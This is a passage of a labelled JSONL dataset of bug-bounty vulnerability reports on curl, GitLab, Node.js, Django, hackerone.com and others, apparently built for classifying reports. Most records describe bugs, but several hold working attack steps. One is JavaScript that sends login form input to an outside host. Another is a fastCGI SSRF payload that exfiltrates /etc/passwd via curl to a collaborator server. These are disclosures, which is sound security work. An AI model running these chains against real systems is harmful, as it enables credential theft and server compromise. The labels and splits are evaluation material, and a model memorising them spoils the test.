`lib/hostip.c`, for example:\n ```\ndiff --git a/lib/hostip.c b/lib/hostip.c\nindex 2381290fd..0148f2861 100644\n--- a/lib/hostip.c\n+++ b/lib/hostip.c\n@@ -75,6 +75,7 @@\n /* alarm-based timeouts can only be used with all the dependencies satisfied */\n #define USE_ALARM_TIMEOUT\n #endif\n+#define USE_ALARM_TIMEOUT\n\n #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */\n\n ```\n 2. Compile libcurl\n 3. Compile version of https://curl.se/libcurl/c/multithread.html but add `curl_easy_setopt(curl, CURLOPT_TIMEOUT, 2);` to `pull_one_url` function.\n 4. Change DNS config to point to blackhole DNS server at `3.219.212.117` (blackhole.webpagetest.org)\n 5. Execute the compiled `multithread` and the application will segfault.\n\n```\n$ LD_LIBRARY_PATH=./lib/.libs:$LD_LIBRARY_PATH gdb ./multithread\nGNU gdb (Debian 13.1-2) 13.1\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later \nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType \"show copying\" and \"show warranty\" for details.\nThis GDB was configured as \"x86_64-linux-gnu\".\nType \"show configuration\" for configuration details.\nFor bug reporting instructions, please see:\n.\nFind the GDB manual and other documentation resources online at:\n .\n\nFor help, type \"help\".\nType \"apropos word\" to search for commands related to \"word\"...\nReading symbols from ./multithread...\n(No debugging symbols found in ./multithread)\n(gdb) r\nStarting program: /home/user/curl/multithread\n/home/user/curl/multithread: ./lib/.libs/libcurl.so.4: no version information available (required by /home/user/curl/multithread)\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n[New Thread 0x7ffff6ffc6c0 (LWP 2733684)]\nThread 0, gets http://curl.haxx.se/\n[New Thread 0x7ffff67fb6c0 (LWP 2733685)]\nThread 1, gets ftp://cool.haxx.se/\n[New Thread 0x7ffff5ffa6c0 (LWP 2733686)]\n[New Thread 0x7ffff57f96c0 (LWP 2733687)]\nThread 2, gets http://www.contactor.se/\n[New Thread 0x7ffff4ff86c0 (LWP 2733688)]\n[New Thread 0x7fffe77fe6c0 (LWP 2733690)]\n[New Thread 0x7fffe7fff6c0 (LWP 2733689)]\nThread 3, gets www.haxx.se\n[New Thread 0x7fffe6ffd6c0 (LWP 2733691)]\n\nThread 1 \"multithread\" received signal SIGSEGV, Segmentation fault.\n0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n(gdb) bt\n#0 0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n#1 0x00007ffff7f546dd in Curl_resolv_timeout () from ./lib/.libs/libcurl.so.4\n#2 0x0000000000000000 in ?? ()\n```\n\n## Risk discussion\nI don't consider this issue a major risk since it likely will affect only small percentage of target platforms. Some ", "source": "hackerone", "timestamp": "2023-05-17", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "6b0b5cfc86420d785891", "text": "[Command Injection - Generic] Remote Command Execution via Github import\n\n### Summary\n\nThis is very similar to https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/#Remote%20Command%20Execution%20via%20Github%20import and allows arbitrary redis commands to be injected when imported a GitHub repository.\n\nWhen importing a GitHub repo the api client uses `Sawyer` for handling the responses. This takes a json hash and converts it into a ruby class that has methods matching all of the keys:\n\nhttps://github.com/lostisland/sawyer/blob/v0.9.2/lib/sawyer/resource.rb#L106-L110\n```ruby\n def self.attr_accessor(*attrs)\n attrs.each do |attribute|\n class_eval do\n define_method attribute do\n @attrs[attribute.to_sym]\n end\n\n define_method \"#{attribute}=\" do |value|\n @attrs[attribute.to_sym] = value\n end\n\n define_method \"#{attribute}?\" do\n !!@attrs[attribute.to_sym]\n end\n end\n end\n end\n```\n\nThis happens recursively, and allows for any method to be overridden including built-in methods such as `to_s`.\n\nThe redis gem uses `to_s` and `bytesize` to generate the RESP command, so if a `Sawyer::Resource` is ever passed in that has a controllable hash it can allow arbitrary redis commands to be injected into the stream as the string will be shorter than the `$` size provided (see https://redis.io/docs/reference/protocol-spec/)\n\nhttps://github.com/redis/redis-rb/blob/v4.4.0/lib/redis/connection/command_helper.rb#L20\n```ruby\n i = i.to_s\n command << \"$#{i.bytesize}\"\n command << i\n```\n\nThe patch for CVE-2022-2884 added validation to `Gitlab::Cache::Import::Caching` but there is another spot where the `Sawyer::Resource` is passed to redis:\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v15.3.1-ee/lib/gitlab/github_import/importer/repository_importer.rb#L55\n```ruby\n def import_repository\n project.ensure_repository\n\n refmap = Gitlab::GithubImport.refmap\n project.repository.fetch_as_mirror(project.import_url, refmap: refmap, forced: true)\n\n project.change_head(default_branch) if default_branch\n\n # The initial fetch can bring in lots of loose refs and objects.\n # Running a `git gc` will make importing pull requests faster.\n Repositories::HousekeepingService.new(project, :gc).execute\n\n true\n end\n```\n\nThe `default_branch` param comes from the client repository (which is a nested Sawyer::Resource of attacker controlled data), and is passed to `change_head` which then calls `branch_exists?` and `branch_names_include?` which passes the value to redis:\n\nhttps://gitlab.com/gitlab-org/gitlab/-/blob/v15.3.1-ee/lib/gitlab/repository_cache_adapter.rb#L71\n```ruby\n define_method(\"#{name}_include?\") do |value|\n ivar = \"@#{name}_include\"\n memoized = instance_variable_get(ivar) || {}\n lookup = proc { __send__(name).include?(value) } # rubocop:disable GitlabSecurity/PublicSend\n\n next memoized[value] if memoized.key?(value)\n\n memoized[value] =\n if strong_memoized?(name)\n lookup.call\n else\n result, exists = redis_set_cache.try_include?(name, value)\n\n exists ? result : lookup.call\n end\n\n instance_variable_set(ivar, memoized)[value]\n end\n```\n\nSo by returning an api response with a `default_branch` that overrides `to_s` and `bytesize` you can call arbitrary redis commands:\n\n```json\n {\n \"default_branch\": {\n \"to_s\": {\n \"to_s\": 'ggg\\r\\nINJECT_RESP_HERE',\n \"bytesize\": 3,\n }\n }\n }\n```\n\nThis can be combined with a call to `Marshal.load` when loading a _gitlab_session to execute a deserialisation gadget (such as https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html) and gain RCE.\n\n### Steps to reproduce\n\n1. edit {F1882976} and change the comm", "source": "hackerone", "timestamp": "2022-10-06", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "1a2b85256945d7d19b66", "text": "[Business Logic Errors] CVE-2022-27782: TLS and SSH connection too eager reuse\n\n## Summary:\nCurl fails to consider some security related options when reusing TLS connections. For example:\n- CURLOPT_SSL_OPTIONS\n- CURLOPT_PROXY_SSL_OPTIONS\n- CURLOPT_CRLFILE\n- CURLOPT_PROXY_CRLFILE\n\nAs a result for example TLS connection with lower security (`CURLSSLOPT_ALLOW_BEAST`,` CURLSSLOPT_NO_REVOKE`) connection reused when it should no longer be. Also connection that has been authenticated perviously with `CURLSSLOPT_AUTO_CLIENT_CERT` might be reused for connections that should not be.\n\n## Steps To Reproduce:\n1. `(echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nHello\\n\"; sleep 5; echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nAgain\\n\") | openssl s_server -cert cert.pem -key privkey.pem -cert_chain chain.pem -accept 9443`\n2. `curl -v --ssl-no-revoke --ssl-allow-beast https://targethost.tld:9443 -: https://targethost.tld:9443`\n\nConnections are made using the same reused connection even though security settings change.\n\nWith curl built against openssl:\n1. `curl http://cdp.geotrust.com/GeoTrustRSACA2018.crl | openssl crl -out testcrl.pem`\n2. `curl -v https://curl.se -: --crlfile crlfile.pem https://curl.se`\n\nThe crlfile.pem use should result in `curl: (60) SSL certificate problem: unable to get certificate CRL` but is ignored since previous connection is reused.\n\nWith curl built against Schannel and revoked certificate:\n1. `curl -v --ssl-no-revoke https://revoked.grc.com -: https://revoked.grc.com`\n\nSecond connection will reuse the existing connection even though revocation check is no longer requested.\n\n## Note:\n\nThere may be more options that might have the similar issues. These were the most obvious I could see (ones having obvious security impact).\n\n## Impact\n\nWrong identity (client certificate) or TLS security options being used for subsequent connections to the same hosts.", "source": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "02c5e9e7a8855cd59cd2", "text": "[Server-Side Request Forgery (SSRF)] mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040\n\nHello Acronis team,\n\nPlease run\n\ncurl -ksL -m5 -o /dev/null -I -w \"%{http_code}\" \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\"\ncurl -ksL -m5 \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\" | grep Protocol\n\n\nand get following output\n\n404 and {\"Protocol\":\"ActiveSync\",\"Url\":\"https://eas.outlook.com/Microsoft-Server-ActiveSync\"}\n\nProving that mail.acronis.com is vulnerable to CVE-2022-41040\n\nPoc video attached\n\n## Impact\n\nSSRF can be used to for unauthorized actions or access to confidential data.", "source": "hackerone", "timestamp": "2022-10-13", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "752a99b6493f5bad56be", "text": "[Business Logic Errors] CVE-2022-27778: curl removes wrong file on error\n\n## Summary:\nCurl command has a logic flaw that results in removal of a wrong file when combining `--no-clobber` and `--remove-on-error` if the target file name exists and an error occurs.\n\n## Steps To Reproduce:\n 1. `echo \"important file\" > foo`\n 2. `echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: 666\\r\\n\\r\\nHello\\n\" | nc -l -p 9999`\n 3. `curl -m 3 --no-clobber --remove-on-error --output foo http://testserver.tld:9999/`\n 4. `ls -l foo*`\n 5. `cat foo.1`\n\n`-m 3` is used here to simulate a denial of service of the connection performed by the attacker.\n\nThe bug appears to happen because the remote-on-error `unlink` is called without considering the no-clobber generated file name:\n- no-clobber name generation; https://github.com/curl/curl/blob/3fd1d8df3a2497078d580f43c17311e6f58186a1/src/tool_cb_wrt.c#L88\n- remove-on-error unlink: https://github.com/curl/curl/blob/f7f26077bc563375becdb2adbcd49eb9f28590f9/src/tool_operate.c#L598\n\n## Impact\n\nRemoval of a file that was supposed not to be overwritten (data loss). Incomplete file left of disk when it should have been removed. This can lead to potential loss of integrity or availability.\n\nFor this attack to work the attacker of course would need to know a scenario where the victim is performing curl operation with `--no-clobber` `--remove-on-error` options.", "source": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "925359b67ab07a2fe00d", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27536: GSS delegation too eager connection re-use\n\n## Summary:\nWhen considering reuse of existing connections different `CURLOPT_GSSAPI_DELEGATION` (libcurl) `--delegation` (curl) option is not taken into consideration. This can lead to reuse of previously established connection when it should no longer be (as more strict or no delegation was requested).\n\n## Steps To Reproduce:\n\n 1. `curl --negotiate -u : --delegation \"always\" https://server/path -: --negotiate -u : --delegation \"none\" https://server/path`\n\n## Remediation\n\n- Safest option is to not reuse connections if different `CURLOPT_GSSAPI_DELEGATION` levels are being used. It **might** also be correct to not reuse connections with \"laxer\" `CURLOPT_GSSAPI_DELEGATION`: \"none\" should only allow reusing \"none\" level, \"policy\" should only allow \"none\" or \"policy\" level, while \"always\" can reuse all connections otherwise deemed appropriate for reuse.\n\n## Impact\n\nExisting connection that was established via more lax delegation will be reused for connection that should not succeed due to more restrictive delegation requested. The practical impact can vary, but I believe it is likely quite low, as it should be quite rare to have connections attempted with mixed delegation policies like this.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "592c509336fa825c4353", "text": "[Improper Access Control - Generic] Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`\n\n## Summary:\nShopify have a github repository https://github.com/Shopify/unity-buy-sdk\nIn the repository there is a github action, which is used a base action from an external github repository.\nThat github account as not registered on github.com\nSo I was able to takeover the account and host PoC.\n\n## Shops Used to Test:\nNA\n\n## Relevant Request IDs:\nNA\n\n## Steps To Reproduce:\n\n 1. Go to https://github.com/Shopify/unity-buy-sdk/blob/master/.github/workflows/build.yml#L71\n 2. You will see this github repository `MirrorNG/unity-runner` getting used as base action at line 71\n 3. Try accessing the github repository https://github.com/MirrorNG/unity-runner you will be redirected to https://github.com/MirageNet/unity-runner\n 4. This happens when github organization name or username is renamed, github redirects all the old urls to new github account\n 5. But with this, the old github username becomes available for anyone to register and when someones registers it the redirection will stop and all links will open newly created repositories.\n 6. Try accessing the github organization https://github.com/MirrorNG you will see takeover message\n\n**Note:** I haven't taken over the repository, so as to avoid breaking the existing action as its getting used.\n\n## Supporting Material:\n\n- https://github.com/Shopify/unity-buy-sdk/blob/master/.github/workflows/build.yml#L71\n- https://github.com/MirrorNG\n\n{F1565368}\n\n## Reference\n\nhttps://hackerone.com/reports/1087489\n\n## Impact\n\nAn attacker can takeover the github account and host malicious action on it, when any any pull request is sent on the repository, it will end up running the action and you can see below screenshot, unity credentials are getting passed to that action. Action will get access to shopify's credentials.\n\n{F1565369}\n\nAlso, since github actions can create github tokens for use at run time using `${{ secrets.GITHUB_TOKEN }}` an attacker can get access to all the private repositories of the organization", "source": "hackerone", "timestamp": "2022-07-12", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2383d258afd4283c1692", "text": "[Uncontrolled Resource Consumption] Missing character limitation allows to put generate a database error\n\nHi Security Team,\nSummary:\n=========\nThere is no limit to the number of characters in the display name, which allows a DoS attack. The DoS attack affects server-side.\nDescription\n=========\nOn the input form of Username in nextcloud.com/settings/user there's no Input validation using this you can send more payload and may cause of Denial of service or error code 500 Internal Server Error/Internal Error\nProof of Concept\n==============\n1.Go and login to your account\n2. Now go to setting and Deck ---> Add Boards section\n3.Insert name and intercept it\n4. Send to repeater replace it with payload the response code on the server side is 500 Internal Server Error\n\n## Impact\n\nImpact\n=======\nRemediation:\n===========\n+Implementing input validation\n+Validating free-form Unicode text\n+Define the allowed set of characters to be accepted.\n+Minimum and maximum value range\nImpact\n======\nAttacker can perform a DOS because of lack of input validation", "source": "hackerone", "timestamp": "2023-01-09", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "344c9ef67d357b6796ca", "text": "[Cross-site Scripting (XSS) - Reflected] XSS on link and window.opener\n\nHi possible xss and error when clicking on the link .\n\n`
    \n \n \n \n
    \n`\n\nor \n\n`
    \n \n \n \n
    \n`\n\n## Impact\n\nRedirection from the original site to an evil site or execution of js code\n\nPlease check that the domain is `slack`\n\n{F765317}", "source": "hackerone", "timestamp": "2023-01-23", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "bc508ef2ce1fbc21b4a8", "text": "[HTTP Request Smuggling] CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding\n\nOriginal Report: https://hackerone.com/reports/1501679\n\n## Impact\n\nDepending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.", "source": "hackerone", "timestamp": "2022-07-22", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "627274b26f7d55c0c342", "text": "[Unknown] [CVE-2023-38546] cookie injection with none file\n\nhttps://hackerone.com/reports/2148242\n\n## Impact\n\ncookie injection into a program using libcurl, if several conditions are met", "source": "hackerone", "timestamp": "2023-11-23", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "7c72b0a61caa5c1ddf4e", "text": "[Improper Input Validation] CVE-2022-35252: control code in cookie denial of service\n\nhttps://hackerone.com/reports/1613943\n\n## Impact\n\ncontrol code in cookie denial of service", "source": "hackerone", "timestamp": "2022-11-05", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "011f2c92d2d361cd1535", "text": "[Improper Access Control - Generic] CVE-2023-40611: Apache Airflow Dag Runs Broken Access Control Vulnerability\n\n##Description:\n\nApache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc.\n\nUsers should upgrade to version 2.7.1 or later which has removed the vulnerability.\n\n##Vulnerability Exploitation:\n\n1.Select Browse-->DAG Runs, we can see the Dag Run list.\n\n{F2691945}\n\n2.Select a Dag, and edit it.\n\n{F2691944}\n\n3. We can see that the Conf parameter text box is gray and cannot be edited. The current user does not have permission to modify the Conf value.\n\n{F2691946}\n\n4.Click Save to intercept the request message and modify the parameter value of Conf to \"1111111111111\".\n\n{F2691948}\n\n5.Successfully modified beyond permission.\n\n{F2691947}\n\n## Impact\n\nBroken Access Control", "source": "hackerone", "timestamp": "2023-10-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "fc8330e0ffc15652fe59", "text": "[Uncontrolled Resource Consumption] CVE-2023-46695: Potential denial of service vulnerability in UsernameField on Windows\n\nIn Django versions before 4.2.7, 4.1.13, and 3.2.23, I sent a POST request to the admin login page using Burp Suite, editing the request to send over 1 million invalid unicode characters to my local web server running Django. (I used: \"¾\")\nAfter submitting, a single request took 4.4 seconds on average.\nWhen I sent 20 concurrent requests, then I got 60 second wait times, and 504 gateway timeout errors on my machine.\n{F2871465}\nNormal ascii characters don't do this and the page loads instantly.\n\n## Impact\n\nDenial of Service anywhere a form contains a UsernameField that checks for errors.", "source": "hackerone", "timestamp": "2023-11-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "d10cdfabd6c9a604d6a2", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS on www.hackerone.com due to deleted S3-bucket from old page_widget\n\nHi,\n\nI hope you all are good! Here's a funny little bug :) I tried making the most out of it and hope you'll like it.\n\nAs you probably know, you're proxying `https://www.hackerone.com/resources` to `read.uberflip.com`. Uberflip has done a great job isolating content for hubs between custom domains pointing to them, so it wasn't that easy to find something interesting here. However, after a while I noticed that there's an old concept called \"page widgets\" that are still present cross-customers for Uberflip under `/read/page_widget/XXX` where `XXX` is a numeric ID of a widget.\n\nI have no idea how these page widgets are created, but a lot of them seem old. Like, *really* old. Most of them used `http` to load any additional assets which prevented `https://www.hackerone.com` from loading any of the HTTP-assets, but after some digging I did find a few widget-IDs that used HTTPS to load javascript.\n\nOne of those widgets looked like this:\n\n```html\n\n\nFlipbook Widget\n
    \n```\n\nWhat was funny with this one was that the S3-bucket `vspcode` did not exist. I could now claim this bucket and run javascript on `https://www.hackerone.com`:\n\n```\n$ aws s3api create-bucket --profile frans --bucket vspcode\n{\n \"Location\": \"/vspcode\"\n}\n\n$ echo \"alert(document.domain + ':' + location.href);\" > vspoverlayrun1.js\n\n$ aws s3 cp vspoverlayrun1.js s3://vspcode/ --acl public-read --profile frans\n\nupload: ./vspoverlayrun1.js to s3://vspcode/vspoverlayrun1.js\n```\n\nI could then visit the widget and see:\n\n{F1771181}\n\nAs you're already aware, the `www`-subdomain is still isolated from the app-domain at `https://hackerone.com`. However, the concept of separating an app using `www` vs apex is – I would say – not a standard concept at all. This means that for example password managers will actually help the user by still suggesting auto completion on `www` if the saved login is on the apex-domain. This applies for example both to Safari and Chrome:\n\n{F1771182}\n\n{F1771183}\n\nSo I made a javascript that will replace the full content of the page with the sign-in-form of `https://hackerone.com`. The only difference is that it'll log any events interacting with the inputs:\n\n```js\nhistory.pushState('','Sign in', 'https://www.hackerone.com/users/sign_in')\nfunction log() { \n var x = new FormData(document.forms[0]);\n (new Image()).src='https://MY-DOMAIN/hackerone/?' + btoa(JSON.stringify(Object.fromEntries(x.entries())))\n};\ndocument.body.parentElement.innerHTML = 'login-page-of-hackerone.com';\n```\n\nThis allows me to see any actions taken or any auto-completion triggering on these forms on my own host:\n\n{F1771184}\n\n### PoC\n\nHere's how my page looks like:\n\n{F1771180}\n\nHere's a video showing the concept of loading the website:\n\n{F1771179}\n\nAnd here's the vulnerable URL:\n\n```\nhttps://www.hackerone.com/resources/read/page_widget/413780\n```\n\nRegards,\nFrans\n\n## Impact\n\n#", "source": "hackerone", "timestamp": "2023-03-10", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "1014071f2707fed4c4ec", "text": "Sielco Radio Link 2.06 'id' Cookie Brute Force Session Hijacking\n\nSeverity: high", "source": "zeroscience", "timestamp": "2023-03-30", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "a4be3d1d2a2d59c39ab1", "text": "[Misconfiguration] Outdated Copyright Message @ Welcome email\n\nPOC :\n\nDescription : Outdated Copyright is present @ Welcome to UPchieve! email which is of years \"2020\"\n\nImpacted Security Property : Integrity\n\nASVS Categories : Architecture , Design and Threat Modeling\n\nPOC email and video : Gmail - Welcome to UPchieve!.pdf and recording-1632912432386.webm \n\nSuggested Remediation : Year mentioned in the copyright should be updated to the current one and at present it is 2021\n\n@thug645\n\n## Impact\n\nIt will create bad branding impression in front of stake holders.", "source": "hackerone", "timestamp": "2022-03-26", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "87bd2662abb7d7dd7d18", "text": "[Modification of Assumed-Immutable Data (MAID)] Prototype pollution via console.table properties\n\n**Summary:**\n\nAttacker control of the second `properties` parameter of `console.table` may lead to prototype pollution.\n\n**Description:**\n\nDue to the formatting logic of the `console.table` function it is not safe to allow user controlled input to be passed to the `properties` parameter while simultaneously passing a plain object with at least one property as the first parameter.\n\nThe prototype pollution has very limited control, in that it only allows an empty string to be assigned numerical keys of the object prototype.\n\n## Steps To Reproduce:\n\nThe vulnerability can be reproduced in the Node.js REPL, tested with version `v16.7.0`:\n\n 1. Run the following: `console.table({foo: 'bar'}, ['__proto__'])`\n 2. Verify that the object prototype has been polluted: `Object.prototype[0] === ''`\n\nThe pollution will vary depending on the number of properties on the object passed as the first parameter, with each additional property assigning another incrementing index of the object prototype. This means that if the first parameter is also controlled by the attacker, it is possible to assign empty strings from `0..n` to the object prototype, for any `n`:\n\n```\n> console.table({a: 1, b: 1, c: 1}, ['__proto__'])\nUncaught TypeError: Cannot create property '0' on string ''\n\n> Object.prototype\n[Object: null prototype] { '0': '', '1': '', '2': '' }\n```\n\nThe vulnerable assignment can be found [here](https://github.com/nodejs/node/blob/3f7dabdfdc9e2a3cd3f92e377755c0dd43f6751b/lib/internal/console/constructor.js#L576) in the Node.js `console.table` implementation.\n\nA suggested remediation is to ignore `properties` named `'__proto__'`, or to use a different data structure to store the computed table fields. For example:\n\n```diff\n const keys = properties || ObjectKeys(item);\n for (const key of keys) {\n+ if (key === '__proto__') {\n+ continue\n+ }\n if (map[key] === undefined)\n map[key] = [];\n```\n\n## Impact:\n\nUsers of `console.table` have no reason to expect the danger of passing on user input to the second `properties` array, and may therefore do so without sanitation. In the even that for example a web server is exposed to this vulnerability, it is likely to be a very effective denial of service attack. In extremely rare cases the prototype pollution can lead to more severe attack vectors such as bypassing authorization mechanisms, although due to limited control of the pollution this is unlikely.\n\n## Supporting Material/References:\n\n * [CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')](https://cwe.mitre.org/data/definitions/1321.html)\n * [The vulnerable assignment](https://github.com/nodejs/node/blob/3f7dabdfdc9e2a3cd3f92e377755c0dd43f6751b/lib/internal/console/constructor.js#L576)\n\n## Impact\n\nUsers of `console.table` have no reason to expect the danger of passing on user input to the second `properties` array, and may therefore do so without sanitation. In the even that for example a web server is exposed to this vulnerability, it is likely to be a very effective denial of service attack. In extremely rare cases the prototype pollution can lead to more severe attack vectors such as bypassing authorization mechanisms, although due to limited control of the pollution this is unlikely.", "source": "hackerone", "timestamp": "2022-01-11", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "c0a184abec879b9fa380", "text": "[Use After Free] Occasional use-after-free in multi_done() libcurl-7.81.0\n\nWe are seeing the use of a `struct connectdata *` on a thread after it was returned to the connection cache (and thus available for use on other threads including potential deallocation) in `multi_done()` in libcurl-7.81.0. This could occasionally result in an actual use-after-free, witnessed on Windows 10 platform.\n\n## Steps To Reproduce:\n- [`multi_done()` line 717](https://github.com/curl/curl/blob/curl-7_81_0/lib/multi.c#L717) a call is made to `Curl_conncache_return_conn()`\n- `Curl_conncache_return_conn()` returns `TRUE` (conn was returned to the cache and available for use in other threads) and execution continues on [line 719](https://github.com/curl/curl/blob/curl-7_81_0/lib/multi.c#L719) where the code derefs the now unowned `conn` to get the `connection_id`\n- We have a fork with a [commit](https://github.com/luminixinc/curl/commit/e8560cb3a2aa0c104d1afcc77490b70bad1ce9cd) that both tests (inline, not formally) and offers a potential fix for this issue.\n- See attached screenshot showing assert firing in debug build\n\n## Impact\n\nUnsure.\n\nI'm not a hacker, and would have been happy to submit this as a GitHub issue instead, but _discretion being the better part of valor_, decided to post this issue here instead :)\n\nTangentially, I do not care to get credit or receive a bounty for this issue. Would be great to get this fixed as I suggested or in some other manner, thanks!", "source": "hackerone", "timestamp": "2022-03-09", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "33aafe89e6267dc3395d", "text": "Osprey Pump Controller 1.0.1 (pseudonym) Semi-blind Command Injection\n\nSeverity: critical", "source": "zeroscience", "timestamp": "2023-02-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "9beec8bf1da61cf6e415", "text": "[Cross-site Scripting (XSS) - Stored] Stored Cross Site Scripting at http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode\n\n## Summary\nThe application exposes store ADMIN page at below URL and is accessible without authentication. \n```\nhttp://www.grouplogic.com/ADMIN/store/index.cfm\n```\nThe ADMIN page provides several functionalities. Among them the below functionality is found to be vulnerable to stored XSS.\n- View and Edit Promo Code (http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode)\n\n\n## Steps To Reproduce\n1. Navigate to below URL to access the store admin page without authentication.\n```\nhttp://www.grouplogic.com/ADMIN/store/index.cfm\n```\n2. Navigate to promo codes section. (http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode)\n3. Edit any promo code.\n4. Add any of below payload in the Promo Code field.\n```\nPayload 1:\n----------\n

    XSS

    \n\nPayload 2:\n----------\n\n```\n5. Click the Edit Promo Code Button to save modified the promo code.\n6. Navigating again to the promo code page, in case of payload 1, XSS string is rendered, hovering mouse over it triggers xss. In case of payload 2, as soon as the promo code page is opened, xss triggers.\n\n## Recommendations\nIt is highly recommended to implement output encoding. \nEncode the following characters with HTML entity encoding to prevent switching into any execution context, such as script, style, or event handlers. Using hex entities is recommended in the spec. The 5 characters significant in XML``` (&, <, >, \", ')```:\n\n```\n & --> &\n < --> <\n > --> >\n \" --> "\n ' --> '\n```\nReference: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n## Impact\n\nXSS can be used to :\n- Steal cookies, password\n- Website Defacement\n- Redirect Victim to Malicious site \n- Log keystrokes etc.", "source": "hackerone", "timestamp": "2022-06-07", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "132fa0611035a6ae858f", "text": "[Server-Side Request Forgery (SSRF)] SSRF + RCE через fastCGI в POST /api/nr/video\n\nDomain, site, application\n--\napp.nativeroll.tv\n\n\nSteps to reproduce\n--\n1. Традиционно нужен аксес токен от аккаунта паблишера, можно зарегистрировать здесь https://seedr.ru/register-user/publisher\n2. Войти как паблишер https://seedr.ru/login/publisher\n3. Поперехватывать запросы, получить токен.\n4. Скачать тулзу https://github.com/tarunkant/Gopherus, запустить \n```\n./gopherus.py --exploit fastcgi\n```\nНа первый вопрос просто нажать Энтер (сработает дефолтный файл), во втором: вбить команду для исполнения. \nВ моем случае ```curl -F file=@/etc/passwd 9nxvmc3h8ym4rye1jwur68tc137xvm.burpcollaborator.net/rce```\n\nПример вывода утилиты: \n```\ngopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH133%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%85%04%00%3C%3Fphp%20system%28%27curl%20-F%20file%3D%40/etc/passwd%209nxvmc3h8ym4rye1jwur68tc137xvm.burpcollaborator.net/rce%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00\n```\nОбратите внимание, что при смене команды для исполнения нужно заново вызывать утилиту и задавать команду там, редачить прямо в этом выводе может не сработать, т.к. протокол бинарный и там есть неочевидные вещи.\n\n5. На своем сервере установить скрипт, который редиректит по полученному из утилиты адресу. Мой пример\n```\n\n\n```\n\n6. Отправить следующий запрос (здесь мои данные, нужно заменить значения access_token и tag на ваш токен и ваш сервер с вашим скриптом).\n```\nPOST /api/nr/video?access_token=e3c0d2382d0486f400cf5ab8490c370877397e13 HTTP/1.1\nHost: app.nativeroll.tv\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 86\n\ndata={\"type\":\"VAST\",\"name\":\"test\",\"tag\":\"http://eb65-109-235-218-134.ngrok.io/r2.php\"}\n```\n\nПолучаем отбивку с содержимым 